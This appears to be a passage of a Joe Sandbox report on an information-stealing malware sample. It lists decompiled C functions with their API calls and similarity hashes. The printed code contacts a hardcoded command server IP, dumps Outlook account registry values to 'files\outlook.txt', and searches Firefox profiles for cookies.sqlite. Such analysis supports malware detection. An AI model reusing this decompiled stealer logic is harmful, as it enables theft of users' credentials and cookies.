                                                                                				InternetCloseHandle( *(_t52 - 0x78));
                                                                                				_pop(_t48);
                                                                                				_pop(_t51);
                                                                                				_pop(_t38);
                                                                                				return E0041DEB4(_t37, _t38,  *(_t52 + 0x390) ^ _t52, _t47, _t48, _t51);
                                                                                			}


















                                                                                APIs
                                                                                • GetProcessHeap.KERNEL32(00000000,05F5E0FF,94.130.174.62,00000000,00000000), ref: 0040EF55
                                                                                • HeapAlloc.KERNEL32(00000000), ref: 0040EF5C
                                                                                • InternetOpenA.WININET(0043E028,00000000,00000000,00000000,00000000), ref: 0040EF6D
                                                                                • InternetSetOptionA.WININET(00000000,00000002,?,00000004), ref: 0040EF86
                                                                                • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 0040EF98
                                                                                • InternetReadFile.WININET(?,?,00000400,?), ref: 0040EFB5
                                                                                • InternetCloseHandle.WININET(?), ref: 0040EFD8
                                                                                • InternetCloseHandle.WININET(?), ref: 0040EFE1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Internet$CloseHandleHeapOpen$AllocFileOptionProcessRead
                                                                                • String ID: 94.130.174.62
                                                                                • API String ID: 891040511-384399413
                                                                                • Opcode ID: 878709bd005b3029b6d617eaceff7e15be5b9930906d2b05fdf27e83d4c08367
                                                                                • Instruction ID: 1f73ae765ea78ab5668d243b99c32d2340bec995ce60702b1ba3443bd60daa3a
                                                                                • Opcode Fuzzy Hash: 878709bd005b3029b6d617eaceff7e15be5b9930906d2b05fdf27e83d4c08367
                                                                                • Instruction Fuzzy Hash: 7B219A71941128AFEB309FB6DC08ADEBFB9EB4A710F20053AF105A3251CA740914CF69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 70%
                                                                                			E004035ED(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                				intOrPtr* _t29;
                                                                                				void* _t30;
                                                                                				intOrPtr* _t39;
                                                                                				intOrPtr* _t42;
                                                                                				intOrPtr* _t43;
                                                                                				intOrPtr* _t46;
                                                                                				void* _t49;
                                                                                				char* _t62;
                                                                                				void* _t66;
                                                                                				void* _t67;
                                                                                				void* _t68;
                                                                                				void* _t69;
                                                                                				void* _t70;
                                                                                
                                                                                				_t70 = __eflags;
                                                                                				_push(0x54);
                                                                                				E004219DE(E004374EC, __ebx, __edi, __esi);
                                                                                				_t59 = _t67 - 0x50;
                                                                                				E004032BE(__ebx, __ecx, _t67 - 0x50, __edi, __esi, _t70, _t67 - 0x60);
                                                                                				 *(_t67 - 4) =  *(_t67 - 4) & 0x00000000;
                                                                                				_t29 = E004037E9(_t67 - 0x30, L"files\\outlook.txt");
                                                                                				if( *((intOrPtr*)(_t29 + 0x14)) >= 8) {
                                                                                					_t29 =  *_t29;
                                                                                				}
                                                                                				_t30 = E0041E704(_t29, L"a+");
                                                                                				_t65 = _t67 - 0x30;
                                                                                				_t49 = _t30;
                                                                                				E00403960(0, _t67 - 0x30, 1);
                                                                                				_t62 =  *(_t67 - 0x50);
                                                                                				_t72 = _t62;
                                                                                				if(_t62 > 0) {
                                                                                					_push("\n");
                                                                                					_push(_t49);
                                                                                					E0041E879(_t49, _t62, _t65, _t72);
                                                                                					if(_t62 > 0) {
                                                                                						 *(_t67 - 0x50) = _t62;
                                                                                						_t66 = 0;
                                                                                						_t62 = "%s\n";
                                                                                						do {
                                                                                							_t12 =  *((intOrPtr*)(_t67 - 0x60)) + 4; // 0x4
                                                                                							_t39 = _t66 + _t12;
                                                                                							_t75 =  *((intOrPtr*)(_t39 + 0x14)) - 0x10;
                                                                                							if( *((intOrPtr*)(_t39 + 0x14)) >= 0x10) {
                                                                                								_t39 =  *_t39;
                                                                                							}
                                                                                							_push(_t39);
                                                                                							_push("%s : ");
                                                                                							_push(_t49);
                                                                                							E0041E879(_t49, _t62, _t66, _t75);
                                                                                							_t42 =  *((intOrPtr*)(_t67 - 0x60)) + _t66;
                                                                                							_t69 = _t68 + 0xc;
                                                                                							if( *_t42 == 4) {
                                                                                								_push( *((intOrPtr*)(_t42 + 0x40)));
                                                                                								_t43 = E00417463(_t49, _t67 - 0x4c, _t59, _t62, _t66, __eflags);
                                                                                								__eflags =  *((intOrPtr*)(_t43 + 0x14)) - 0x10;
                                                                                								if(__eflags >= 0) {
                                                                                									_t43 =  *_t43;
                                                                                								}
                                                                                								_push(_t43);
                                                                                								_push(_t62);
                                                                                								_push(_t49);
                                                                                								E0041E879(_t49, _t62, _t66, __eflags);
                                                                                								_t68 = _t69 + 0xc;
                                                                                								E00402C34(_t67 - 0x4c, 1, 0);
                                                                                							} else {
                                                                                								_t46 = _t42 + 0x20;
                                                                                								_t77 =  *((intOrPtr*)(_t46 + 0x14)) - 0x10;
                                                                                								if( *((intOrPtr*)(_t46 + 0x14)) >= 0x10) {
                                                                                									_t46 =  *_t46;
                                                                                								}
                                                                                								_push(_t46);
                                                                                								_push(_t62);
                                                                                								_push(_t49);
                                                                                								E0041E879(_t49, _t62, _t66, _t77);
                                                                                								_t68 = _t69 + 0xc;
                                                                                							}
                                                                                							_t66 = _t66 + 0x44;
                                                                                							_t20 = _t67 - 0x50;
                                                                                							 *_t20 =  *(_t67 - 0x50) - 1;
                                                                                							_t78 =  *_t20;
                                                                                						} while ( *_t20 != 0);
                                                                                					}
                                                                                				}
                                                                                				_push(_t49);
                                                                                				E0041EAA2(_t49, _t62, _t65, _t78);
                                                                                				_t33 =  *((intOrPtr*)(_t67 - 0x60));
                                                                                				if( *((intOrPtr*)(_t67 - 0x60)) != 0) {
                                                                                					E00403BE2(_t33,  *((intOrPtr*)(_t67 - 0x5c)));
                                                                                					_push( *((intOrPtr*)(_t67 - 0x60)));
                                                                                					E0041DFFD();
                                                                                				}
                                                                                				return E00421A61(_t49, _t62, _t65);
                                                                                			}

















                                                                                APIs
                                                                                • __EH_prolog3_GS.LIBCMT ref: 004035F4
                                                                                  • Part of subcall function 004032BE: __EH_prolog3.LIBCMT ref: 004032DD
                                                                                  • Part of subcall function 004032BE: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?,00000038), ref: 0040331B
                                                                                  • Part of subcall function 004032BE: RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?,00000038), ref: 0040359F
                                                                                • _fprintf.LIBCMT ref: 0040364A
                                                                                • _fprintf.LIBCMT ref: 00403675
                                                                                • _fprintf.LIBCMT ref: 00403695
                                                                                  • Part of subcall function 00417463: __EH_prolog3_GS.LIBCMT ref: 0041746D
                                                                                • _fprintf.LIBCMT ref: 004036B5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _fprintf$H_prolog3_$EnumH_prolog3OpenValue
                                                                                • String ID: %s$%s : $files\outlook.txt
                                                                                • API String ID: 712738878-2709736865
                                                                                • Opcode ID: 5748f1a7f4af215cfc2eb253eee005c533de17ad3d26a97a5216e135064a83d9
                                                                                • Instruction ID: 024fc39400cc96a88b513800fc1af541d7739ed78b29ecd8fd2c54f9bc0ac5cf
                                                                                • Opcode Fuzzy Hash: 5748f1a7f4af215cfc2eb253eee005c533de17ad3d26a97a5216e135064a83d9
                                                                                • Instruction Fuzzy Hash: 5931A771900214AFDB24AF96DC46E8E7B7DFF41305F15042BF401BB2D2DABADA408A59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 54%
                                                                                			E00413D67(void* __ebx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4) {
                                                                                				signed int _v8;
                                                                                				char _v276;
                                                                                				char _v540;
                                                                                				intOrPtr _v544;
                                                                                				void* __esi;
                                                                                				void* __ebp;
                                                                                				signed int _t17;
                                                                                				int _t34;
                                                                                				void* _t40;
                                                                                				void* _t44;
                                                                                				signed int _t47;
                                                                                
                                                                                				_t45 = __edi;
                                                                                				_t44 = __edx;
                                                                                				_t39 = __ebx;
                                                                                				_t17 =  *0x447674; // 0x4124c941
                                                                                				_v8 = _t17 ^ _t47;
                                                                                				_v544 = _a4;
                                                                                				E00427E30( &_v276, 0, 0x104);
                                                                                				E00427E30( &_v540, 0, 0x104);
                                                                                				_t40 = 0x1a;
                                                                                				E00417B4D(_t40);
                                                                                				 *0x44a1b8( &_v276, __edi,  &_v276);
                                                                                				 *0x44a1b8( &_v540,  &_v276);
                                                                                				 *0x44a1b8( &_v540, "..\\profiles.ini");
                                                                                				_t34 = GetFileAttributesA( &_v540);
                                                                                				if(_t34 != 0xffffffff && (_t34 & 0x00000010) == 0) {
                                                                                					if(E00413C5A(__ebx) != 0) {
                                                                                						E00411133(__ebx, 0x43e028,  &_v276, _v544);
                                                                                					}
                                                                                					_t34 = FreeLibrary( *0x44a09c);
                                                                                				}
                                                                                				return E0041DEB4(_t34, _t39, _v8 ^ _t47, _t44, _t45, 0x104);
                                                                                			}















                                                                                APIs
                                                                                • _memset.LIBCMT ref: 00413D93
                                                                                • _memset.LIBCMT ref: 00413DA5
                                                                                  • Part of subcall function 00417B4D: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,00413DBC,014A10F8,00413DBC,?,?,?,?,?,?,?), ref: 00417B63
                                                                                • lstrcat.KERNEL32(?,014A10F8), ref: 00413DC4
                                                                                • lstrcat.KERNEL32(?,?), ref: 00413DD8
                                                                                • lstrcat.KERNEL32(?,..\profiles.ini), ref: 00413DEA
                                                                                • GetFileAttributesA.KERNEL32(?,?,?,?,?,?,?), ref: 00413DF7
                                                                                  • Part of subcall function 00413C5A: __wgetenv.LIBCMT ref: 00413C71
                                                                                  • Part of subcall function 00413C5A: LoadLibraryA.KERNEL32(014A10F8,00000104,00413E0B,?,?,?,?,?,?), ref: 00413CAB
                                                                                  • Part of subcall function 00413C5A: GetProcAddress.KERNEL32(00000000), ref: 00413CC7
                                                                                  • Part of subcall function 00413C5A: GetProcAddress.KERNEL32 ref: 00413CDA
                                                                                  • Part of subcall function 00413C5A: GetProcAddress.KERNEL32 ref: 00413CED
                                                                                  • Part of subcall function 00413C5A: GetProcAddress.KERNEL32 ref: 00413D00
                                                                                  • Part of subcall function 00413C5A: GetProcAddress.KERNEL32 ref: 00413D13
                                                                                  • Part of subcall function 00413C5A: GetProcAddress.KERNEL32 ref: 00413D26
                                                                                • FreeLibrary.KERNEL32(?,?,?,?,?,?), ref: 00413E2E
                                                                                  • Part of subcall function 00411133: wsprintfA.USER32 ref: 00411167
                                                                                  • Part of subcall function 00411133: FindFirstFileA.KERNEL32(?,?), ref: 0041117E
                                                                                  • Part of subcall function 00411133: StrCmpCA.SHLWAPI(?,00440CA4), ref: 0041119F
                                                                                  • Part of subcall function 00411133: StrCmpCA.SHLWAPI(?,00440CA8), ref: 004111B9
                                                                                  • Part of subcall function 00411133: wsprintfA.USER32 ref: 004111E0
                                                                                  • Part of subcall function 00411133: StrCmpCA.SHLWAPI(?,cookies.sqlite), ref: 004111F5
                                                                                  • Part of subcall function 00411133: FindNextFileA.KERNEL32(?,?), ref: 004112AF
                                                                                  • Part of subcall function 00411133: FindClose.KERNEL32(?), ref: 004112C3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressProc$FileFindlstrcat$Library_memsetwsprintf$AttributesCloseFirstFolderFreeLoadNextPath__wgetenv
                                                                                • String ID: ..\profiles.ini
                                                                                • API String ID: 2353499708-121201995
                                                                                • Opcode ID: c5109f79e3b41afc8b4dc26a71616e54ede66ce622f81052e4755de27e6dcddf
                                                                                • Instruction ID: 626b67a89415a511a1e9c1a0841bf52094ca65d6e6912a9e903d9c89db8a5763
                                                                                • Opcode Fuzzy Hash: c5109f79e3b41afc8b4dc26a71616e54ede66ce622f81052e4755de27e6dcddf
                                                                                • Instruction Fuzzy Hash: 14218B75D4021CABCB10DF64EC49FDEB7BCAF19304F0005AAB609E2191DA749BC98F98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 35%
                                                                                			E00407FEB(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                				short _t12;
                                                                                				intOrPtr _t13;
                                                                                				void* _t14;
                                                                                				void* _t24;
                                                                                				void* _t31;
                                                                                				void* _t35;
                                                                                				void* _t36;
                                                                                				void* _t37;
                                                                                				void* _t39;
                                                                                				void* _t42;
                                                                                				void* _t45;
                                                                                				char* _t47;
                                                                                				void* _t48;
                                                                                				void* _t52;
                                                                                
                                                                                				_push(4);
                                                                                				E00421975(E00435D69, __ebx, __edi, __esi);
                                                                                				 *(_t48 - 4) =  *(_t48 - 4) & 0x00000000;
                                                                                				_t50 =  *((intOrPtr*)(_t48 + 0x1c)) - 0x10;
                                                                                				_t12 = 0x2c;
                                                                                				 *((short*)(_t48 - 0x10)) = _t12;
                                                                                				_t13 =  *((intOrPtr*)(_t48 + 8));
                                                                                				if( *((intOrPtr*)(_t48 + 0x1c)) < 0x10) {
                                                                                					_t13 = _t48 + 8;
                                                                                				}
                                                                                				_t14 = E0041F4CD(_t42, _t50, _t13, _t48 - 0x10);
                                                                                				_t45 = 1;
                                                                                				if(_t14 == 0) {
                                                                                					L28:
                                                                                					return E00421A4D(E00402C34(_t48 + 8, 1, 0));
                                                                                				} else {
                                                                                					_t47 = "1";
                                                                                					do {
                                                                                						_t52 = _t45 - 7;
                                                                                						if(_t52 > 0) {
                                                                                							_t31 = _t45 - 8;
                                                                                							__eflags = _t31;
                                                                                							if(_t31 == 0) {
                                                                                								__eflags =  *0x44a1d8(_t14, _t47);
                                                                                								if(__eflags == 0) {
                                                                                									 *0x44a336 = 1;
                                                                                								}
                                                                                							} else {
                                                                                								_t39 = _t31 - 1;
                                                                                								__eflags = _t39;
                                                                                								if(_t39 == 0) {
                                                                                									__eflags =  *0x44a1d8(_t14, _t47);
                                                                                									if(__eflags == 0) {
                                                                                										 *0x44a337 = 1;
                                                                                									}
                                                                                								} else {
                                                                                									__eflags = _t39 - 3;
                                                                                									if(__eflags == 0) {
                                                                                										E0040381A(0x448554, _t14);
                                                                                									}
                                                                                								}
                                                                                							}
                                                                                						} else {
                                                                                							if(_t52 == 0) {
                                                                                								__eflags =  *0x44a1d8(_t14, _t47);
                                                                                								if(__eflags == 0) {
                                                                                									 *0x44a335 = 1;
                                                                                								}
                                                                                							} else {
                                                                                								_t35 = _t45 - 1;
                                                                                								if(_t35 == 0) {
                                                                                									 *0x4484fc = 1;
                                                                                								} else {
                                                                                									_t36 = _t35 - 1;
                                                                                									if(_t36 == 0) {
                                                                                										__eflags =  *0x44a1d8(_t14, _t47);
                                                                                										if(__eflags == 0) {
                                                                                											 *0x44a330 = 1;
                                                                                										}
                                                                                									} else {
                                                                                										_t37 = _t36 - 1;
                                                                                										if(_t37 == 0) {
                                                                                											__eflags =  *0x44a1d8(_t14, _t47);
                                                                                											if(__eflags == 0) {
                                                                                												 *0x44a331 = 1;
                                                                                											}
                                                                                										} else {
                                                                                											if(_t37 == 1) {
                                                                                												_t24 =  *0x44a1d8(_t14, _t47);
                                                                                												_t57 = _t24;
                                                                                												if(_t24 == 0) {
                                                                                													 *0x44a332 = 1;
                                                                                												}
                                                                                											}
                                                                                										}
                                                                                									}
                                                                                								}
                                                                                							}
                                                                                						}
                                                                                						_t14 = E0041F4CD(_t42, _t57, 0, _t48 - 0x10);
                                                                                						_t45 = _t45 + 1;
                                                                                					} while (_t14 != 0);
                                                                                					goto L28;
                                                                                				}
                                                                                			}


















                                                                                APIs
                                                                                • __EH_prolog3.LIBCMT ref: 00407FF2
                                                                                • _strtok.LIBCMT ref: 00408013
                                                                                • StrCmpCA.SHLWAPI(00000000,00440C78,00000004,0040B9B4,00000000,?,?,?,?,?,?,?,?,00000013), ref: 00408045
                                                                                • StrCmpCA.SHLWAPI(00000000,00440C78,00000004,0040B9B4,00000000,?,?,?,?,?,?,?,?,00000013), ref: 00408061
                                                                                • _strtok.LIBCMT ref: 004080F5
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _strtok$H_prolog3
                                                                                • String ID:
                                                                                • API String ID: 3733332552-0
                                                                                • Opcode ID: 7fd46a0d1de4fada3cba7fe27e1e72892158378edddce49b161f34bdfdbbb50a
                                                                                • Instruction ID: 3d3425f143a10d73ae9a13560423d5514b7d02cdb3f64c70a79aca0c9b8df96a
                                                                                • Opcode Fuzzy Hash: 7fd46a0d1de4fada3cba7fe27e1e72892158378edddce49b161f34bdfdbbb50a
                                                                                • Instruction Fuzzy Hash: 5731B8342482439AEB249B25DD48F6B3A589B12345F05807FE581F62D2EF7D888CD76F
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 83%
                                                                                			E00412108(void* __ebx, void** __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                				CHAR* _t31;
                                                                                				void* _t37;
                                                                                				void* _t42;
                                                                                				void* _t48;
                                                                                				intOrPtr* _t51;
                                                                                				signed int _t57;
                                                                                				long _t74;
                                                                                				void* _t77;
                                                                                
                                                                                				_push(0x5c);
                                                                                				E004219DE(E00435F87, __ebx, __edi, __esi);
                                                                                				_t31 =  *(_t77 + 8);
                                                                                				_t76 = "0123456789ABCDEF";
                                                                                				_t74 = _t77 - 0x24;
                                                                                				asm("movsd");
                                                                                				asm("movsd");
                                                                                				asm("movsd");
                                                                                				asm("movsd");
                                                                                				 *(_t77 - 0x60) = __ecx;
                                                                                				 *(_t77 - 0x68) = _t31;
                                                                                				 *(_t77 - 0x64) =  *(_t77 + 0xc);
                                                                                				asm("movsb");
                                                                                				_t57 = 0;
                                                                                				if(lstrlenA(_t31) > 0) {
                                                                                					_t76 =  *(_t77 - 0x68);
                                                                                					_t37 = E0041FB20(_t77 - 0x24,  *_t76);
                                                                                					if(_t37 != 0) {
                                                                                						_t74 = _t37 - _t77 - 0x24 << 4;
                                                                                						_t42 = E0041FB20(_t77 - 0x24, _t76[1]);
                                                                                						if(_t42 == 0) {
                                                                                							goto L2;
                                                                                						} else {
                                                                                							_t57 =  !(_t42 - _t77 - 0x00000024 + _t74 ^ 0xffffffa3) & 0x000000ff;
                                                                                							_t13 = lstrlenA(_t76) - 1; // -1
                                                                                							_t74 = _t13;
                                                                                							 *( *(_t77 - 0x64)) = _t74;
                                                                                							_t48 = HeapAlloc(GetProcessHeap(), 8, _t74);
                                                                                							 *( *(_t77 - 0x60)) = _t48;
                                                                                							if(_t48 == 0) {
                                                                                								goto L2;
                                                                                							} else {
                                                                                								 *(_t77 - 0x30) =  *(_t77 - 0x30) & 0x00000000;
                                                                                								 *((intOrPtr*)(_t77 - 0x2c)) = 0xf;
                                                                                								 *((char*)(_t77 - 0x40)) = 0;
                                                                                								E0040381A(_t77 - 0x40, _t76);
                                                                                								 *(_t77 - 4) =  *(_t77 - 4) & 0x00000000;
                                                                                								_t76 = _t77 - 0x5c;
                                                                                								_t51 = E0040C689(_t77 - 0x40, _t77 - 0x5c, _t77 - 0x40, 2, 0xffffffff);
                                                                                								if( *((intOrPtr*)(_t51 + 0x14)) >= 0x10) {
                                                                                									_t51 =  *_t51;
                                                                                								}
                                                                                								E0041E985( *( *(_t77 - 0x60)), _t74, _t51);
                                                                                								E00402C34(_t77 - 0x5c, 1, 0);
                                                                                								E00402C34(_t77 - 0x40, 1, 0);
                                                                                								goto L8;
                                                                                							}
                                                                                						}
                                                                                					} else {
                                                                                						L2:
                                                                                					}
                                                                                				}
                                                                                				return E00421A61(_t57, _t74, _t76);
                                                                                			}












                                                                                APIs
                                                                                • __EH_prolog3_GS.LIBCMT ref: 0041210F
                                                                                • lstrlenA.KERNEL32(?,0000005C,00412287,?,?,00000028), ref: 00412133
                                                                                • lstrlenA.KERNEL32(?), ref: 0041218F
                                                                                • GetProcessHeap.KERNEL32(00000008,-00000001), ref: 004121A0
                                                                                • HeapAlloc.KERNEL32(00000000), ref: 004121A7
                                                                                • _strcpy_s.LIBCMT ref: 004121F1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heaplstrlen$AllocH_prolog3_Process_strcpy_s
                                                                                • String ID: 0123456789ABCDEF
                                                                                • API String ID: 2514983032-2554083253
                                                                                • Opcode ID: d43be65713725ad00583aa58a8319f91af52ee4ea9ecb3dc47b07fd51a09d770
                                                                                • Instruction ID: 55460aa40e66c37f53f99abea5bf570abdfc6f0dda536e0858ed6c8013af8748
                                                                                • Opcode Fuzzy Hash: d43be65713725ad00583aa58a8319f91af52ee4ea9ecb3dc47b07fd51a09d770
                                                                                • Instruction Fuzzy Hash: B2319E729003099FEB14DFA4CD55BDE77B8AF0A314F10016AF505FB291DB79AA45CB18
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 85%
                                                                                			E00417368(void* __ebx, intOrPtr* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                				signed int _t67;
                                                                                				void* _t68;
                                                                                				signed int _t76;
                                                                                				void* _t91;
                                                                                				intOrPtr _t98;
                                                                                				void* _t101;
                                                                                				signed int _t102;
                                                                                				signed int _t114;
                                                                                				intOrPtr _t117;
                                                                                				intOrPtr* _t118;
                                                                                				intOrPtr _t119;
                                                                                				signed int _t120;
                                                                                				intOrPtr* _t121;
                                                                                				intOrPtr _t123;
                                                                                				signed int _t125;
                                                                                				intOrPtr* _t127;
                                                                                				void* _t129;
                                                                                				void* _t130;
                                                                                
                                                                                				_t130 = __eflags;
                                                                                				_t119 = __edx;
                                                                                				_push(0x34);
                                                                                				E004219DE(E00435E94, __ebx, __edi, __esi);
                                                                                				_t123 = 0xf;
                                                                                				 *((intOrPtr*)(_t129 - 4)) = 0;
                                                                                				_t127 = __ecx;
                                                                                				 *(_t129 - 0x34) = 0;
                                                                                				 *((intOrPtr*)(_t129 - 0x40)) = __ecx;
                                                                                				 *((intOrPtr*)(_t129 - 0x18)) = _t123;
                                                                                				 *((intOrPtr*)(_t129 - 0x1c)) = 0;
                                                                                				 *((char*)(_t129 - 0x2c)) = 0;
                                                                                				E00403A16(_t129 - 0x2c, _t130, "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789", 0x24);
                                                                                				 *((intOrPtr*)(_t129 - 4)) = 1;
                                                                                				 *((intOrPtr*)(_t127 + 0x14)) = _t123;
                                                                                				 *((intOrPtr*)(_t127 + 0x10)) = 0;
                                                                                				 *_t127 = 0;
                                                                                				 *(_t129 - 0x34) = 1;
                                                                                				Sleep(0x64);
                                                                                				_t67 = E0041F6BE(_t129 - 0x2c, _t119, _t130, 0);
                                                                                				_t124 = _t67;
                                                                                				_t68 = 2;
                                                                                				 *((intOrPtr*)(_t129 - 0x38)) = _t119;
                                                                                				_push(E00417319(_t68, _t130));
                                                                                				E0041F58A(E0041F2F3() * _t67);
                                                                                				 *((intOrPtr*)(_t129 - 0x30)) = 0;
                                                                                				_t131 =  *((intOrPtr*)(_t129 + 8));
                                                                                				if( *((intOrPtr*)(_t129 + 8)) <= 0) {
                                                                                					L14:
                                                                                					E00402C34(_t129 - 0x2c, 1, 0);
                                                                                					return E00421A61(0, _t124, _t127);
                                                                                				} else {
                                                                                					while(1) {
                                                                                						_t76 = E0041F59C(_t131);
                                                                                						asm("cdq");
                                                                                						_t114 = 0x24;
                                                                                						_t120 = _t76 % _t114;
                                                                                						if( *((intOrPtr*)(_t129 - 0x1c)) <= _t120) {
                                                                                							break;
                                                                                						}
                                                                                						_t98 =  *((intOrPtr*)(_t129 - 0x2c));
                                                                                						if( *((intOrPtr*)(_t129 - 0x18)) < 0x10) {
                                                                                							_t98 = _t129 - 0x2c;
                                                                                						}
                                                                                						_t117 =  *((intOrPtr*)(_t127 + 0x14));
                                                                                						 *((char*)(_t129 - 0x38)) =  *((intOrPtr*)(_t98 + _t120));
                                                                                						if(_t117 < 0x10) {
                                                                                							_t121 = _t127;
                                                                                						} else {
                                                                                							_t121 =  *_t127;
                                                                                						}
                                                                                						_t101 =  *((intOrPtr*)(_t127 + 0x10)) + _t121;
                                                                                						if(_t117 < 0x10) {
                                                                                							_t118 = _t127;
                                                                                						} else {
                                                                                							_t118 =  *_t127;
                                                                                						}
                                                                                						if(_t101 != 0) {
                                                                                							_t102 = _t101 - _t118;
                                                                                							__eflags = _t102;
                                                                                						} else {
                                                                                							_t102 = 0;
                                                                                						}
                                                                                						_t124 = _t102;
                                                                                						E00418795(_t118, _t102, _t127, _t129, 1,  *((intOrPtr*)(_t129 - 0x38)));
                                                                                						 *((intOrPtr*)(_t129 - 0x30)) =  *((intOrPtr*)(_t129 - 0x30)) + 1;
                                                                                						if( *((intOrPtr*)(_t129 - 0x30)) <  *((intOrPtr*)(_t129 + 8))) {
                                                                                							continue;
                                                                                						} else {
                                                                                							goto L14;
                                                                                						}
                                                                                						goto L17;
                                                                                					}
                                                                                					E0041D406("invalid string position");
                                                                                					asm("int3");
                                                                                					_push(0xd8);
                                                                                					E004219DE(E004370C7, 0, _t124, _t127);
                                                                                					_t125 = _t114;
                                                                                					__eflags = 0;
                                                                                					 *((intOrPtr*)(_t129 - 0x30)) = 0;
                                                                                					 *((intOrPtr*)(_t125 + 0x14)) = 0xf;
                                                                                					 *((intOrPtr*)(_t125 + 0x10)) = 0;
                                                                                					 *(_t129 - 0x34) = _t125;
                                                                                					 *_t125 = 0;
                                                                                					 *((intOrPtr*)(_t129 - 0xe0)) = 0x4425c8;
                                                                                					 *((intOrPtr*)(_t129 - 0xd0)) = 0x442704;
                                                                                					 *((intOrPtr*)(_t129 - 0x80)) = 0x441158;
                                                                                					_push(_t129 - 0xc8);
                                                                                					 *((intOrPtr*)(_t129 - 4)) = 1;
                                                                                					_push(_t129 - 0xe0);
                                                                                					 *((intOrPtr*)(_t129 - 0x30)) = 3;
                                                                                					E004169F3(_t127, 0); // executed
                                                                                					 *((intOrPtr*)(_t129 - 4)) = 2;
                                                                                					_t46 =  *((intOrPtr*)(_t129 - 0xe0)) + 4; // 0x60
                                                                                					 *((intOrPtr*)(_t129 +  *_t46 - 0xe0)) = 0x4411fc;
                                                                                					_push(_t129 - 0xc8);
                                                                                					E00414F20(0, _t125, _t127, 0);
                                                                                					 *((intOrPtr*)(_t129 - 0xc8)) = 0x4411bc;
                                                                                					 *((intOrPtr*)(_t129 - 0x8c)) = 0;
                                                                                					 *((intOrPtr*)(_t129 - 0x88)) = 0;
                                                                                					_push( *((intOrPtr*)(_t129 + 8)));
                                                                                					_push(_t129 - 0xd0);
                                                                                					 *((intOrPtr*)(_t129 - 4)) = 4;
                                                                                					E00417DA6(0, _t114, _t125, _t127, 0);
                                                                                					_t91 = E0040C982(_t129 - 0xe0, _t129 - 0x2c);
                                                                                					 *((char*)(_t129 - 4)) = 5;
                                                                                					E0040CFB8(_t125, _t91);
                                                                                					E00402C34(_t129 - 0x2c, 1, 0);
                                                                                					 *((char*)(_t129 - 4)) = 0;
                                                                                					E0040B593(_t129 - 0xe0, 0, _t125);
